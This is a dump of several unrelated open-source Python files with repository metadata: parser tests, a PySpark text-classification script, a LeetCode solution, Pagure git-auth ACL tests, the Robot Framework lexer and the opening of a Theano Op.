4a22734e15ab8143dc7a61c04b39b1dc34d2e5ea | 2,226 | py | Python | test/matchers/test_any_matcher.py | colinta/chomsky | 1c618f02a8e4b573e9c13860181ffeec0f49ccd9 | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2015-07-30T14:58:46.000Z | 2021-07-09T15:29:52.000Z | test/matchers/test_any_matcher.py | colinta/chomsky | 1c618f02a8e4b573e9c13860181ffeec0f49ccd9 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | test/matchers/test_any_matcher.py | colinta/chomsky | 1c618f02a8e4b573e9c13860181ffeec0f49ccd9 | [
"BSD-2-Clause-FreeBSD"
] | 1 | 2017-01-27T13:09:01.000Z | 2017-01-27T13:09:01.000Z | from pytest import raises
from chomsky import *
any_matcher = Any(Literal('Joey'), Literal('Bob'), Literal('Billy'))
autoany_matcher = Literal('Joey') | Literal('Bob') | Literal('Billy')
any_number_matcher = Any(Number | String)
def test_any_repr():
assert repr(Any(Literal('Joey'), Literal('Bob'), Literal('Billy'))) == "Any(Literal('Joey'), Literal('Bob'), Literal('Billy'))"
assert repr(Any(Literal('Joey'), Literal('Bob'), Literal('Billy'), suppress=False)) == "Any(Literal('Joey'), Literal('Bob'), Literal('Billy'))"
assert repr(Any(Literal('Joey'), Literal('Bob'), Literal('Billy'), suppress=True)) == "Any(Literal('Joey'), Literal('Bob'), Literal('Billy'), suppress=True)"
def test_autoany_repr():
assert repr(Literal('Joey') | Literal('Bob') | Literal('Billy')) == "Any(Literal('Joey') | Literal('Bob') | Literal('Billy'))"
assert repr('Joey' | Literal('Bob') | Literal('Billy')) == "Any(Literal('Joey') | Literal('Bob') | Literal('Billy'))"
assert repr(Literal('Joey') | Literal('Bob') | 'Billy') == "Any(Literal('Joey') | Literal('Bob') | Literal('Billy'))"
assert repr(Literal('Joey') | 'Bob' | Literal('Billy')) == "Any(Literal('Joey') | Literal('Bob') | Literal('Billy'))"
assert repr('Joey' | Literal('Bob') | 'Billy') == "Any(Literal('Joey') | Literal('Bob') | Literal('Billy'))"
def test_any_lengths():
assert any_matcher.minimum_length() == 3
assert any_matcher.maximum_length() == 5
def test_any():
for name in ['Joey', 'Bob', 'Billy']:
parsed = any_matcher(name)
assert parsed == name
def test_any_number():
assert any_number_matcher('-123') == Number('-123')
def test_any_string():
assert any_number_matcher('"123"') == String('"123"')
def test_any_string_fail():
with raises(ParseException):
any_number_matcher('-"123"')
def test_any_same_char():
for char in ['***', '**', '*']:
parsed = Any(Literal('***'), Literal('**'), Literal('*'))(char)
assert parsed == char
def test_autoany():
for name in ['Joey', 'Bob', 'Billy']:
parsed = autoany_matcher(name)
assert parsed == name
def test_any_fail():
with raises(ParseException):
any_matcher('bahhumbug')
| 35.333333 | 161 | 0.624888 |
4a22741e812c01a3414201d00bc9629668cdcf34 | 5,746 | py | Python | case2.py | krishnaiitd/LogisticRegression | bfd5967521baa222aea0df5255354e5248f23b98 | [
"Apache-2.0"
] | null | null | null | case2.py | krishnaiitd/LogisticRegression | bfd5967521baa222aea0df5255354e5248f23b98 | [
"Apache-2.0"
] | null | null | null | case2.py | krishnaiitd/LogisticRegression | bfd5967521baa222aea0df5255354e5248f23b98 | [
"Apache-2.0"
] | null | null | null | #>>>>>> Random Forest Classification on AWS reviews datasets, with Cross Validation taking equally from rating datasets, i.e dataset is based towards rating 5 <<<<<
# Import the Basic libraries
import sys
import json
import string
import random
import timeit
# Import the Spark context and config
from pyspark import SparkContext, SparkConf
from pyspark.sql import SQLContext
# Create the SparkContext, sqlContext objects
conf = SparkConf()
sc = SparkContext(conf=conf)
sqlContext = SQLContext(sc)
from pyspark.sql import DataFrame
# Import the ML library need for text hashing
from pyspark.ml.feature import HashingTF
# Import the MLLIB library for classification
from pyspark.mllib.classification import LogisticRegressionWithLBFGS, LogisticRegressionModel, LogisticRegressionWithSGD
#from pyspark.mllib.regression import LabeledPoint
# Import the Word tokenize
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
# Initial the English word STOPWORDS and STEMMER
PUNCTUATION = set(string.punctuation)
STOPWORDS = set(stopwords.words('english'))
STEMMER = PorterStemmer()
# Initialze the use variables here
numData = 500
numFeatures = 2000
maximumIteration = 100
regParamValue = 0.01
seedValue = 0
# Results sets which will be store in a file after completing all process.
results = [('Name', "Result"), ('File source name', 'LRC_1Gram_Skewness_v8.py'), ('Total number of datasets from each group',numData), ('Total number of datasets from all group', numData*5), ('Total number of Features', numFeatures), ('Classification Parameters:', ''), ('Maximum number of iteration', maximumIteration), ('Reg Param value', regParamValue)]
# Generate unique file name, so that we do not need to change this again and again
uniqueString = '' . join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))
FileName = 'LRC_1Gram_numData' + str(numData) + '_numFeatures' + str(numFeatures) + '_r' + uniqueString
# Read the json file and let's watch the first two lines
#reviewsDF = sqlContext.read.json("file:///home/cloudera/SparkML/__data/InLine.json")
#reviewsDF = sqlContext.read.json("gs://sparkrun123/reviews_Apps_for_Android.json.gz")
reviewsDF = sqlContext.read.json("gs://sparkrun123/InLine.json")
print 'Selecting only overall and review Text'
reviewsDF = reviewsDF.select("overall", "reviewText")
# Make the reviews data set persistent RDD
reviewsDF.persist()
print 'Total number of record in review datasets: ' + str(reviewsDF.count())
print 'Number of records by rating:'
print reviewsDF.groupBy('overall').count().orderBy('overall').show()
# Define the Tokenize
def tokenize(text):
tokens = word_tokenize(text)
lowercased = [t.lower() for t in tokens]
no_punctuation = []
for word in lowercased:
punct_removed = ''.join([letter for letter in word if not letter in PUNCTUATION])
no_punctuation.append(punct_removed)
no_stopwords = [w for w in no_punctuation if not w in STOPWORDS]
stemmed = [STEMMER.stem(w) for w in no_stopwords]
return [w for w in stemmed if w]
print 'Clean the review text dataset'
wordsData = reviewsDF.map(lambda (label, text): (label, tokenize(text)))
# Clear reviewsDF from cache/memory
del reviewsDF
wordsData = sqlContext.createDataFrame(wordsData, ['label', 'words'])
hashingTF_1words = HashingTF(inputCol = "words", outputCol="features", numFeatures = numFeatures)
data = hashingTF_1words.transform(wordsData).select("label", "features")
del wordsData
def TrainLRCModel(trainingData, testData):
print(type(trainingData))
print(trainingData.take(2))
model = LogisticRegressionWithLBFGS.train(trainingData, numClasses=5)
print(type(model))
exit();
predictions = testData.map(lambda p: (p.label, model.predict(p.features)))
correct = predictions.filter(lambda (x, p): x == p)
### Calculate the accuracy of the model using custom method
accuracy = round((correct.count() / float(testData.count())) * 100, 3)
# return the final accuracy
return accuracy
accuracyList = [];
elapsedTimes = [];
for i in range(1,3):
(trainData, testData) = data.randomSplit([.7, .3], seed = seedValue)
start_time = timeit.default_timer()
print 'Model ' + str(i)
print 'Number of dataset in training: ' + str(trainData.count())
print 'Number of dataset in testing: ' + str(testData.count())
# Get the accuracy for model 1
accuracy = TrainLRCModel(trainData, testData)
accuracyList.append(accuracy)
print 'Model ' + str(i) + ' accuracy ' + str(accuracy)
elapsed = timeit.default_timer() - start_time
print "Elapsed time: " + str(round(elapsed / 60, 2)) + ' minutes'
elapsedTimes.append(round(elapsed / 60, 2))
results.append(('Model', i))
results.append(('Number of dataset in training', str(trainData.count())))
results.append(('Number of dataset in testing', testData.count()))
results.append(('Model ' + str(i) + ' accuracy', accuracy))
results.append(("Elapsed time", str(round(elapsed / 60, 2)) + ' minutes'))
print 'All model accuracy list: '
print accuracyList
AverageAccuracy = round(sum(accuracyList) / len(accuracyList), 3)
print 'Average accuracy ' + str(AverageAccuracy) + '%'
results.append(('===Final accuracy=====',''))
results.append(('Average accuracy', str(AverageAccuracy) + '%'))
results.append(('Total time ', str(round(sum(elapsedTimes), 2)) + ' minutes'))
results = sc.parallelize(results)
# Store the actual and predicted classes in a file with name : FileName
def toCSVLine(data):
return ','. join(str(d) for d in data)
lines = results.map(toCSVLine)
lines.saveAsTextFile("gs://spark_123/results/" + FileName)
#lines.saveAsTextFile("file:///home/cloudera/SparkML/__data/" + FileName)
sc.stop()
| 41.042857 | 358 | 0.739297 |
4a22750de6369701cdb7b4806d226f5e36322842 | 210 | py | Python | leetCode/algorithms/easy/keyboard_row.py | ferhatelmas/algo | a7149c7a605708bc01a5cd30bf5455644cefd04d | [
"WTFPL"
] | 25 | 2015-01-21T16:39:18.000Z | 2021-05-24T07:01:24.000Z | leetCode/algorithms/easy/keyboard_row.py | gauravsingh58/algo | 397859a53429e7a585e5f6964ad24146c6261326 | [
"WTFPL"
] | 2 | 2020-09-30T19:39:36.000Z | 2020-10-01T17:15:16.000Z | leetCode/algorithms/easy/keyboard_row.py | ferhatelmas/algo | a7149c7a605708bc01a5cd30bf5455644cefd04d | [
"WTFPL"
] | 15 | 2015-01-21T16:39:27.000Z | 2020-10-01T17:00:22.000Z | class Solution(object):
def findWords(self, words):
rows = [set("qwertyuiop"), set("asdfghjkl"), set("zxcvbnm")]
return [w for w in words if sum(set(w.lower()) <= row for row in rows) == 1]
| 42 | 84 | 0.604762 |
4a2275403d1c338668a1327f31ba33f2cce46823 | 23,308 | py | Python | src/tests/test_pagure_lib_git_auth.py | yifengyou/learn-pagure | e54ba955368918c92ad2be6347b53bb2c24a228c | [
"Unlicense"
] | null | null | null | src/tests/test_pagure_lib_git_auth.py | yifengyou/learn-pagure | e54ba955368918c92ad2be6347b53bb2c24a228c | [
"Unlicense"
] | null | null | null | src/tests/test_pagure_lib_git_auth.py | yifengyou/learn-pagure | e54ba955368918c92ad2be6347b53bb2c24a228c | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
"""
(c) 2015-2018 - Copyright Red Hat Inc
Authors:
Pierre-Yves Chibon <[email protected]>
Patrick Uiterwijk <[email protected]>
"""
from __future__ import unicode_literals, absolute_import
import datetime
import os
import shutil
import sys
import tempfile
import time
import unittest
import pygit2
import six
from mock import patch, MagicMock
sys.path.insert(
0, os.path.join(os.path.dirname(os.path.abspath(__file__)), "..")
)
import pagure.lib.git
import pagure.lib.query
import tests
from pagure.lib.repo import PagureRepo
class PagureLibGitAuthtests(tests.Modeltests):
""" Tests for pagure.lib.git_auth """
config_values = {"authbackend": "test_auth"}
def setUp(self):
super(PagureLibGitAuthtests, self).setUp()
tests.create_projects(self.session)
tests.create_tokens(self.session)
tests.create_tokens_acl(self.session)
self.create_project_full("hooktest")
def test_edit_with_all_allowed(self):
"""Tests that editing a file is possible if ACLs say allowed."""
user = tests.FakeUser()
user.username = "pingou"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "master",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Commits - hooktest - Pagure</title>", output_text
)
self.assertIn("test commit", output_text)
# Check file after the commit
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
def test_edit_with_all_denied(self):
"""Tests that editing a file is not possible if ACLs say denied."""
self.set_auth_status(False)
user = tests.FakeUser()
user.username = "pingou"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "master",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"Remote hook declined the push: "
"Denied push for ref 'refs/heads/master' for user 'pingou'",
output_text,
)
self.assertIn("All changes have been rejected", output_text)
# Check file after the commit:
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
def test_edit_pr(self):
"""Tests the ACLs if they only accept PRs."""
self.set_auth_status(
{"refs/heads/master": "pronly", "refs/heads/source": True}
)
user = tests.FakeUser()
user.username = "pingou"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
# Try editing master branch, should fail (only PRs allowed)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "master",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"Remote hook declined the push: "
"Denied push for ref 'refs/heads/master' for user 'pingou'",
output_text,
)
self.assertIn("All changes have been rejected", output_text)
# Change something in the "source" branch
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "source",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Commits - hooktest - Pagure</title>", output_text
)
self.assertIn("test commit", output_text)
# Check file after the commit:
output = self.app.get("/hooktest/raw/source/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
# Create the PRs
project = pagure.lib.query.get_authorized_project(
self.session, "hooktest"
)
req = pagure.lib.query.new_pull_request(
session=self.session,
repo_from=project,
branch_from="source",
repo_to=project,
branch_to="master",
title="PR to master",
user="pingou",
)
self.session.add(req)
self.session.commit()
# Check file before the merge
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
# Try to merge (should work)
output = self.app.post(
"/hooktest/pull-request/1/merge",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>PR#1: PR to master - hooktest\n - Pagure</title>",
output_text,
)
# Check file after the merge
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
class PagureLibGitAuthPagureBackendtests(tests.Modeltests):
""" Tests for pagure.lib.git_auth """
config_values = {"authbackend": "pagure"}
def setUp(self):
super(PagureLibGitAuthPagureBackendtests, self).setUp()
tests.create_projects(self.session)
tests.create_tokens(self.session)
tests.create_tokens_acl(self.session)
self.create_project_full("hooktest")
def test_edit_no_commit(self):
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "master",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 403)
output_text = output.get_data(as_text=True)
self.assertIn(
"You are not allowed to edit files in this project",
output_text,
)
# Check file after the commit:
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
def test_edit_ticket_rejected(self):
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="ticket",
branches="epel*",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "master",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 403)
output_text = output.get_data(as_text=True)
self.assertIn(
"You are not allowed to edit files in this project",
output_text,
)
# Check file after the commit:
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
def test_edit_contributor_rejected(self):
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="collaborator",
branches="epel*",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "master",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 403)
output_text = output.get_data(as_text=True)
self.assertIn(
"You are not allowed to edit files in this project",
output_text,
)
# Check file after the commit:
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
def test_edit_contributor_passed_epel8(self):
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="collaborator",
branches="epel*",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "epel8",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Commits - hooktest - Pagure</title>", output_text
)
# Check file after the commit:
# master did not change
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
# epel8 did change
output = self.app.get("/hooktest/raw/epel8/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
def test_edit_commit_passed_epel8(self):
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="commit",
branches="epel*",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "epel8",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Commits - hooktest - Pagure</title>", output_text
)
# Check file after the commit:
# master did not change
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
# epel8 did change
output = self.app.get("/hooktest/raw/epel8/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
def test_edit_contributor_passed_epel(self):
# Same test as above but the target branch change
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="collaborator",
branches="epel*",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "epel",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Commits - hooktest - Pagure</title>", output_text
)
# Check file after the commit:
# master did not change
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
# epel did change
output = self.app.get("/hooktest/raw/epel/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
def test_edit_contributor_passed_epel_no_regex(self):
# Same test as above but the allowed branch has no regex
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="collaborator",
branches="epel",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "epel",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Commits - hooktest - Pagure</title>", output_text
)
# Check file after the commit:
# master did not change
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
# epel did change
output = self.app.get("/hooktest/raw/epel/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
def test_edit_contributor_denied_epel8_no_regex(self):
# Same test as above but the allowed branch has no regex
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="collaborator",
branches="epel",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "epel8",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 403)
output_text = output.get_data(as_text=True)
self.assertIn(
"You are not allowed to edit files in this project",
output_text,
)
# Check file after the commit:
# epel not found
output = self.app.get("/hooktest/raw/epel8/f/sources")
self.assertEqual(output.status_code, 404)
| 35.693721 | 92 | 0.53857 |
4a22754faa4739ea57aea8d5f0f0dead5c675d3e | 7,895 | py | Python | src/robot/parsing/lexer/lexer.py | zavatoni/pyStudy_test_robotframework | fbf43aefea694a8404f5870b8c92f42165b10667 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/robot/parsing/lexer/lexer.py | zavatoni/pyStudy_test_robotframework | fbf43aefea694a8404f5870b8c92f42165b10667 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/robot/parsing/lexer/lexer.py | zavatoni/pyStudy_test_robotframework | fbf43aefea694a8404f5870b8c92f42165b10667 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from itertools import chain
from robot.errors import DataError
from robot.utils import get_error_message, FileReader
from .blocklexers import FileLexer
from .context import InitFileContext, TestCaseFileContext, ResourceFileContext
from .tokenizer import Tokenizer
from .tokens import EOS, Token
def get_tokens(source, data_only=False, tokenize_variables=False):
"""Parses the given source to tokens.
:param source: The source where to read the data. Can be a path to
a source file as a string or as ``pathlib.Path`` object, an already
opened file object, or Unicode text containing the date directly.
Source files must be UTF-8 encoded.
:param data_only: When ``False`` (default), returns all tokens. When set
to ``True``, omits separators, comments, continuations, and other
non-data tokens.
Returns a generator that yields :class:`~robot.parsing.lexer.tokens.Token`
instances.
"""
lexer = Lexer(TestCaseFileContext(), data_only, tokenize_variables)
lexer.input(source)
return lexer.get_tokens()
def get_resource_tokens(source, data_only=False, tokenize_variables=False):
"""Parses the given source to resource file tokens.
Otherwise same as :func:`get_tokens` but the source is considered to be
a resource file. This affects, for example, what settings are valid.
"""
lexer = Lexer(ResourceFileContext(), data_only, tokenize_variables)
lexer.input(source)
return lexer.get_tokens()
def get_init_tokens(source, data_only=False, tokenize_variables=False):
"""Parses the given source to init file tokens.
Otherwise same as :func:`get_tokens` but the source is considered to be
a suite initialization file. This affects, for example, what settings are
valid.
"""
lexer = Lexer(InitFileContext(), data_only, tokenize_variables)
lexer.input(source)
return lexer.get_tokens()
class Lexer(object):
def __init__(self, ctx, data_only=False, tokenize_variables=False):
self.lexer = FileLexer(ctx)
self.data_only = data_only
self.tokenize_variables = tokenize_variables
self.statements = []
def input(self, source):
for statement in Tokenizer().tokenize(self._read(source),
self.data_only):
# Store all tokens but pass only data tokens to lexer.
self.statements.append(statement)
if self.data_only:
data = statement[:]
else:
# Separators, comments, etc. already have type, data doesn't.
data = [t for t in statement if t.type is None]
if data:
self.lexer.input(data)
def _read(self, source):
try:
with FileReader(source, accept_text=True) as reader:
return reader.read()
except:
raise DataError(get_error_message())
def get_tokens(self):
self.lexer.lex()
statements = self._handle_old_for(self.statements)
if not self.data_only:
statements = chain.from_iterable(
self._split_trailing_commented_and_empty_lines(s)
for s in statements
)
tokens = self._get_tokens(statements)
if self.tokenize_variables:
tokens = self._tokenize_variables(tokens)
return tokens
def _get_tokens(self, statements):
# Setting local variables is performance optimization to avoid
# unnecessary lookups and attribute access.
if self.data_only:
ignored_types = {None, Token.COMMENT_HEADER, Token.COMMENT,
Token.OLD_FOR_INDENT}
else:
ignored_types = {None}
name_types = (Token.TESTCASE_NAME, Token.KEYWORD_NAME)
separator_type = Token.SEPARATOR
eol_type = Token.EOL
for statement in statements:
name_seen = False
separator_after_name = None
prev_token = None
for token in statement:
token_type = token.type
if token_type in ignored_types:
continue
if name_seen:
if token_type == separator_type:
separator_after_name = token
continue
if token_type != eol_type:
yield EOS.from_token(prev_token)
if separator_after_name:
yield separator_after_name
name_seen = False
if token_type in name_types:
name_seen = True
prev_token = token
yield token
if prev_token:
yield EOS.from_token(prev_token)
def _handle_old_for(self, statements):
end_statement = [Token(Token.SEPARATOR), Token(Token.END)]
old_for = False
for statement in statements:
marker = self._get_first_data_token(statement)
if marker:
if marker.type == Token.OLD_FOR_INDENT:
old_for = True
elif old_for:
if marker.type == Token.END:
# We get here if block has been indented with '\' but
# there is also 'END'. The former is deprecated and
# removing the value causes a deprecation warning.
marker.value = ''
else:
yield end_statement
old_for = False
yield statement
if old_for:
yield end_statement
def _get_first_data_token(self, statement):
non_data_tokens = Token.NON_DATA_TOKENS + (None,)
for token in statement:
if token.type not in non_data_tokens:
return token
return None
def _split_trailing_commented_and_empty_lines(self, statement):
lines = self._split_to_lines(statement)
commented_or_empty = []
for line in reversed(lines):
if not self._is_commented_or_empty(line):
break
commented_or_empty.append(line)
if not commented_or_empty:
return [statement]
lines = lines[:-len(commented_or_empty)]
statement = list(chain.from_iterable(lines))
return [statement] + list(reversed(commented_or_empty))
def _split_to_lines(self, statement):
lines = []
current = []
for token in statement:
current.append(token)
if token.type == Token.EOL:
lines.append(current)
current = []
if current:
lines.append(current)
return lines
def _is_commented_or_empty(self, line):
separator_or_ignore = (Token.SEPARATOR, None)
comment_or_eol = (Token.COMMENT, Token.EOL)
for token in line:
if token.type not in separator_or_ignore:
return token.type in comment_or_eol
return False
def _tokenize_variables(self, tokens):
for token in tokens:
for t in token.tokenize_variables():
yield t
| 37.595238 | 78 | 0.615326 |
4a22767117fd56e2dd92fcb330eed7ea6c329b17 | 1,445 | py | Python | theano/sandbox/minimal.py | michaelosthege/aesara | 55c88832ba71f87c9612d573ede74a4c042ef570 | [
"BSD-3-Clause"
] | 1 | 2020-12-30T19:12:52.000Z | 2020-12-30T19:12:52.000Z | theano/sandbox/minimal.py | luke14free/Theano-PyMC | 511c778f8a595444e009bcad738d552413b16f2c | [
"BSD-3-Clause"
] | null | null | null | theano/sandbox/minimal.py | luke14free/Theano-PyMC | 511c778f8a595444e009bcad738d552413b16f2c | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
from theano import tensor
from theano.gof.graph import Apply
from theano.gof.op import Op
class Minimal(Op):
# TODO : need description for class
